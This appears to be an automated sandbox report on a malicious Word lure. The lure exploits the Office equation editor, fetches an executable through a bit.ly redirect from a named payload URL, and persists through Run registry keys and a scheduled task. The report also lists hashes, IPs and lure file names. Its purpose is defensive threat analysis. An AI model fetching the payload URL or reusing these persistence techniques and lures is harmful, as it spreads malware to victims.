Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.209, 2.20.142.210, 13.107.43.13, 13.107.42.12 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, odc-web-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, l-0004.dc-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, odc-bl-files-brs.onedrive.akadns.net, odc-bl-files-geo.onedrive.akadns.net, apps.identrust.com, au-bg-shim.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:57:33	API Interceptor	50x Sleep call for process: EQNEDT32.EXE modified
07:58:40	API Interceptor	68x Sleep call for process: 69577.exe modified
07:59:02	API Interceptor	723x Sleep call for process: RegAsm.exe modified
07:59:07	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\subfolder1\filename1.exe
07:59:08	API Interceptor	2x Sleep call for process: schtasks.exe modified
07:59:09	Task Scheduler	Run new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0)
07:59:09	API Interceptor	215x Sleep call for process: taskeng.exe modified
07:59:15	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
07:59:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\subfolder1\filename1.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
67.199.248.10	PO55004.doc	Get hash	malicious	Browse	bit.ly/3kioaoe
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	bit.ly/2NUvTNf
	RFQ Document.doc	Get hash	malicious	Browse	bit.ly/3qOyCWN
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	bit.ly/3qN5fEA
	Order.doc	Get hash	malicious	Browse	bit.ly/3boWBW4
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	bit.ly/2NScGvD
	IMG_57109_Scanned.doc	Get hash	malicious	Browse	bit.ly/3kemdsK
	Deadly Variants of Covid 19.doc	Get hash	malicious	Browse	bit.ly/2Me6ei3
	swift payment.doc	Get hash	malicious	Browse	bit.ly/2NmOCRI
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	bit.ly/3qIRVRz
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	bit.ly/3duA4tQ
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	bit.ly/3sdTreK
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.doc	Get hash	malicious	Browse	bit.ly/3dCBRgm
	DHL Shipment Notification 7465649870.doc	Get hash	malicious	Browse	bit.ly/3bhrITG
	Quote QU038097.doc	Get hash	malicious	Browse	bit.ly/3aom5Uu
	IMG_51067.doc__.rtf	Get hash	malicious	Browse	bit.ly/3djdyUC
	IMG_123773.doc	Get hash	malicious	Browse	bit.ly/2Nsv9ym
	B62672021 PRETORIA.doc	Get hash	malicious	Browse	bit.ly/3jOWhDW
	DHL_014073.doc	Get hash	malicious	Browse	bit.ly/3ddwOmz
	PO00004423.doc	Get hash	malicious	Browse	bit.ly/3dcJ7zg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
bit.ly	PO55004.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	RFQ Document.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	67.199.248.10
	Order.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTE.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_57109_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	Deadly Variants of Covid 19.doc	Get hash	malicious	Browse	67.199.248.10
	swift payment.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	67.199.248.11
	_a6590.docx	Get hash	malicious	Browse	67.199.248.11
	Statement-ID28865611496334.vbs	Get hash	malicious	Browse	67.199.248.10
	Statement-ID21488878391791.vbs	Get hash	malicious	Browse	67.199.248.11
	Statement-ID72347595684775.vbs	Get hash	malicious	Browse	67.199.248.10
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.doc	Get hash	malicious	Browse	67.199.248.10

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LEASEWEB-NL-AMS-01NetherlandsNL	PO55004.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	RFQ Document.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	5.79.72.163
	SecuriteInfo.com.Trojan.PackedNET.540.1271.exe	Get hash	malicious	Browse	213.227.154.188
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	MV9tCJw8Xr.exe	Get hash	malicious	Browse	5.79.70.250
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.doc	Get hash	malicious	Browse	5.79.72.163
	Quotation408S_A02021_AHYAN_group_of_companies.doc	Get hash	malicious	Browse	5.79.72.163
	Request For Quotation.PDF.exe	Get hash	malicious	Browse	212.32.237.101
	PO#652.exe	Get hash	malicious	Browse	5.79.87.207
	Parcel _009887 .exe	Get hash	malicious	Browse	212.32.237.92
	PO 20211602.xlsm	Get hash	malicious	Browse	82.192.82.225
	6d0000.exe	Get hash	malicious	Browse	213.227.133.129
	SecuriteInfo.com.Trojan.PackedNET.541.9005.exe	Get hash	malicious	Browse	62.212.86.139
	New Order 83329 PDF.exe	Get hash	malicious	Browse	95.211.208.58
	YTDSetup.exe	Get hash	malicious	Browse	82.192.80.226
	g3hMtp06fF.dll	Get hash	malicious	Browse	77.81.247.140
	SecuriteInfo.com.Heur.4110.xls	Get hash	malicious	Browse	212.32.245.130
	SecuriteInfo.com.Heur.22411.xls	Get hash	malicious	Browse	212.32.245.130
DANILENKODE	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	194.5.98.202
	neue bestellung.PDF.exe	Get hash	malicious	Browse	194.5.97.48
	Orderoffer.exe	Get hash	malicious	Browse	194.5.98.66
	neue bestellung.PDF.exe	Get hash	malicious	Browse	194.5.97.48
	OrderSuppliesQuote0817916.exe	Get hash	malicious	Browse	194.5.97.248
	DHL_6368638172 documento de recibo,pdf.exe	Get hash	malicious	Browse	194.5.97.244
	QuotationInvoices.exe	Get hash	malicious	Browse	194.5.97.248
	PAYMENT_.EXE	Get hash	malicious	Browse	194.5.98.211
	payment.exe	Get hash	malicious	Browse	194.5.98.66
	RFQ_1101983736366355 1101938377388.exe	Get hash	malicious	Browse	194.5.98.21
	Slip copy .xls.exe	Get hash	malicious	Browse	194.5.97.116
	Scan0059.pdf.exe	Get hash	malicious	Browse	194.5.97.34
	DHL AWB # 6008824216.png.exe	Get hash	malicious	Browse	194.5.97.48
	Scan0019.exe	Get hash	malicious	Browse	194.5.97.34
	PurchaseOrdersCSTtyres004786587.exe	Get hash	malicious	Browse	194.5.97.248
	Invoice467972.jar	Get hash	malicious	Browse	194.5.97.18
	Invoice467972.jar	Get hash	malicious	Browse	194.5.97.18
	Hk6Im7DPON.exe	Get hash	malicious	Browse	194.5.98.107
	Zfpmspqv.exe	Get hash	malicious	Browse	194.5.97.21
	Notification of payment.exe	Get hash	malicious	Browse	194.5.97.92
GOOGLE-PRIVATE-CLOUDUS	PO55004.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	RFQ Document.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	67.199.248.10
	Order.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTE.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_57109_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	Deadly Variants of Covid 19.doc	Get hash	malicious	Browse	67.199.248.10
	swift payment.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	67.199.248.11
	_a6590.docx	Get hash	malicious	Browse	67.199.248.11
	Statement-ID28865611496334.vbs	Get hash	malicious	Browse	67.199.248.10
	Statement-ID21488878391791.vbs	Get hash	malicious	Browse	67.199.248.11
	Statement-ID72347595684775.vbs	Get hash	malicious	Browse	67.199.248.10
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.doc	Get hash	malicious	Browse	67.199.248.10

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse
	RFQ # TSI2202708.doc	Get hash	malicious	Browse
	rfq_20712557-20200308 Order.doc	Get hash	malicious	Browse
	31RFQ 49177 PO-DM-11-2018-109159.exe	Get hash	malicious	Browse
	69shipment Details...exe	Get hash	malicious	Browse
	64RFQ#4500052988_AHBGroup_017342213472103_20181024.exe	Get hash	malicious	Browse
	22RFQ#4500052988_AHBGroup_017342213472103_20181024.exe	Get hash	malicious	Browse
	41COSCO TBN FULLY SIGNED CPFN.exe	Get hash	malicious	Browse
	19Request for Quote_Goedeker_6397_3 01-2_12137018.exe	Get hash	malicious	Browse
	72Payment....exe	Get hash	malicious	Browse
	832238740303837363.exe	Get hash	malicious	Browse
	35Request for Quote_SOSi_6397_3 01-2_12137018.exe	Get hash	malicious	Browse
	61Request for Quote_SOSi_6397_3 01-2_12137018.exe	Get hash	malicious	Browse
	17Request for Quote_SOSi_6397_3 01-2_12137018.exe	Get hash	malicious	Browse
	59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221 (1).exe	Get hash	malicious	Browse
	71RFQ Ganix Global-180001899918 & 500037221.exe	Get hash	malicious	Browse
	81PAYMENT.exe	Get hash	malicious	Browse
	59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221.exe	Get hash	malicious	Browse
	2810010518.exe	Get hash	malicious	Browse
	66Doc_BONATTI 18000229 IQ1201 WO 210000102767.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\SMTP Service\smtpsvc.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	4.48905382202799
Encrypted:	false
SSDEEP:	768:GP2Bbv+VazyoD2z9TU//1mz1+M9GnLEu+2hhFRJS8AW:tJv46yoD2BTNz1+M9GLfvw8AW
MD5:	246BB0F8D68A463FD17C235DEB5491C0
SHA1:	63F237F94EAB14CB4DCA7ACB5817644D4428873A
SHA-256:	32B60D7BBA22CC1682F4BA651D86C9FB357BDC82E9A284AB9668E5446BD24BB3
SHA-512:	187D08DF6563739A3A537439F313D9F4D53001FA8A9CD146986DAB3C1168E25E210771AFC2A7D6C2A88EB44F0EEF2E91DDCEA8ABD86742AD0E6D78F07BDF7996
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc, Detection: malicious, Browse Filename: RFQ # TSI2202708.doc, Detection: malicious, Browse Filename: rfq_20712557-20200308 Order.doc, Detection: malicious, Browse Filename: 31RFQ 49177 PO-DM-11-2018-109159.exe, Detection: malicious, Browse Filename: 69shipment Details...exe, Detection: malicious, Browse Filename: 64RFQ#4500052988_AHBGroup_017342213472103_20181024.exe, Detection: malicious, Browse Filename: 22RFQ#4500052988_AHBGroup_017342213472103_20181024.exe, Detection: malicious, Browse Filename: 41COSCO TBN FULLY SIGNED CPFN.exe, Detection: malicious, Browse Filename: 19Request for Quote_Goedeker_6397_3 01-2_12137018.exe, Detection: malicious, Browse Filename: 72Payment....exe, Detection: malicious, Browse Filename: 832238740303837363.exe, Detection: malicious, Browse Filename: 35Request for Quote_SOSi_6397_3 01-2_12137018.exe, Detection: malicious, Browse Filename: 61Request for Quote_SOSi_6397_3 01-2_12137018.exe, Detection: malicious, Browse Filename: 17Request for Quote_SOSi_6397_3 01-2_12137018.exe, Detection: malicious, Browse Filename: 59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221 (1).exe, Detection: malicious, Browse Filename: 71RFQ Ganix Global-180001899918 & 500037221.exe, Detection: malicious, Browse Filename: 81PAYMENT.exe, Detection: malicious, Browse Filename: 59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221.exe, Detection: malicious, Browse Filename: 2810010518.exe, Detection: malicious, Browse Filename: 66Doc_BONATTI 18000229 IQ1201 WO 210000102767.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,..S..................... .......... ........@.. ....................................@.....................................O................................... ................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
SSDEEP:	24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.090852246460565
Encrypted:	false
SSDEEP:	6:kKShbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:93kPlE99SNxAhUeo+aKt
MD5:	BA8C46428A6FA596F901B63BD2866482
SHA1:	406BE55AAF0AF8BCB55E66978678128FF5D936B4
SHA-256:	CFF4081C8033E6D3DF207C1DEC83503A4C7C3619E2780062918DB54E3B407E49
SHA-512:	AD2651B0A73F69FE842082E70978EE982C494A4AF9030D0B369F659DC9D65D01A7B639DA787696096E265A69DD0DA5D0E66581572F9A791A6846696F388AF83D
Malicious:	false
Preview:	p...... ........MI......(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.018531379206123
Encrypted:	false
SSDEEP:	3:kkFkl8fllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKXliBAIdQZV7eAYLit
MD5:	F5024D7097D7BD054FB0E8F112AE0878
SHA1:	DB442D7323A0F13A7B9B146F56A9D17F98DA48F1
SHA-256:	3530EE9892B047529057DAAE8618C3BF7479A2946AC256CDD452CE24D788B015
SHA-512:	1BC6C2F0474F4AD130C9CE37D20AC7367E33D7709251D9A4A7AE148977CD9B2B600DE866839D0B610CF750EB3290B702E28685EA8A0EC962CDA9D2E16479FF4C
Malicious:	false
Preview:	p...... ....`....e......(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\TFppy[1].txt Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	131072
Entropy (8bit):	4.85840802848053
Encrypted:	false
SSDEEP:	3072:FwVUPYLV4+aQTxxs+7Qx+2OGeoyrARHNlyCI2jnyIa3MAB+f/FwGIt1KFzOn1k4H:FwVUPYLV4+aQTxxs+7Qx+2OGeoyrARHs
MD5:	ACFCBD916FA04787E4388B339592DD78
SHA1:	F2A572347C81B71C3A59F00A37F68DB698715460
SHA-256:	EDE5C7B0267F4801A7BEBB22A18035923E71A476CEB3B9D94F582AA199DEB3F0
SHA-512:	23B895AD239AC48726A1446299E4534E496BB891530CB11E3764FB871F5F5097B12CCE346FDBCFE4A1C31D46F31A25CE407B17D6AB1A141BEEF9613E92DA817E
Malicious:	true
IE Cache URL:	https://u.teknik.io/TFppy.txt
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L....$T.................P...................`....@.........................................................................TY..(....p.....................................................................(... ....................................text....M.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3pNzHgj[1].htm Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.534813815767662
Encrypted:	false
SSDEEP:	3:qVvzLURODccZ/vXbvx9nDyZHL+EVMIkFSXbKFvNGb:qFzLIeco3XLx92ZHqEmIMSLWQb
MD5:	83612AE2434582AC7D267DC358EE3AFE
SHA1:	56A7C0DD21B81E84C12388E1F24B9CABB03FBB49
SHA-256:	6B721A8C98F8629EFCD006197C7BB38109F5783C10E2056916A5BF8A3CB4C63F
SHA-512:	53D0B67458C589F4B612EBAD26839934FF617D7E2AE23C624416CA9D2C12C888B4B9A3DA6F0E110F400CAD70F23D1FF7A1C039A8719D66B16A1509F4FF334BFF
Malicious:	false
Preview:	<html>.<head><title>Bitly</title></head>.<body><a href="https://u.teknik.io/TFppy.txt">moved here</a></body>.</html>

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{08186652-BACB-4000-A5A0-0BCBA7498F21}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	2496870
Entropy (8bit):	4.120148428675921
Encrypted:	false
SSDEEP:	12288:fDaFDrFDeFDIFDWFDrFDsFDoFDrFDrWDkFDrFD0jDrFDrFwdFDrFDruDwFDrFDAK:fad+cmdw8de4d+ddCdmEdEdo3Ee
MD5:	5CB2CE6B1963218437AE4593429E3AAD
SHA1:	E7A7BDD84E63B9F56559D4ECA4DB7E4CAC071FD8
SHA-256:	6ADBC21E243E3974B278EFAA85452760E0A00179263646E1597A44DDE263A367
SHA-512:	A6C9C8B3160C8489A4089EAE2430F1D40190A625E826FAE53C953B1F6A5C87C616F2D0B60D1649FDE53909DD2A7568936D7190BC75ACE82ADDE912504118DEBD
Malicious:	false
Preview:	..@.A.p.J.n.b.S.m.E.I.k.B.Y.w.P.B.r.@.-.D.y.s.i.v.y.j.z.Z.m.o.I.e.C.P.i.F.<.e.h.&.&.0._.M.-.C._.g.-.-._.-.d.,.6.4.>.3.2.9.9.7.$.C.v.>.y.t.=.n.5.\|.:.%._.>.j.n.8.%.b.m.;.=.u...2.8..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{784442AB-DE8E-4300-98F0-AE5841A8170E}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9A867ADF-3614-4635-BF44-6C9AC8D8FC42}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3568273340340578
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb7:IiiiiiiiiifdLloZQc8++lsJe1MzQ
MD5:	8BBA101DD4CCBB491B159086265AA203
SHA1:	B05248909106B80A56350FD5334B139A2C4E7B94
SHA-256:	1469FCBD040B763444AF4931D1D3499FFB3E168DAE994EEACB1367376B9260C8
SHA-512:	8C388DCE0A6BF9DC4559088A2F3C2B37E65A6CEA49816F9F2B5D001AF820D04000331B151EF1B2E02286F4B6F254AA9B5F905515F880F55C9883A2A1791E1C3F
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Cab9B56.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
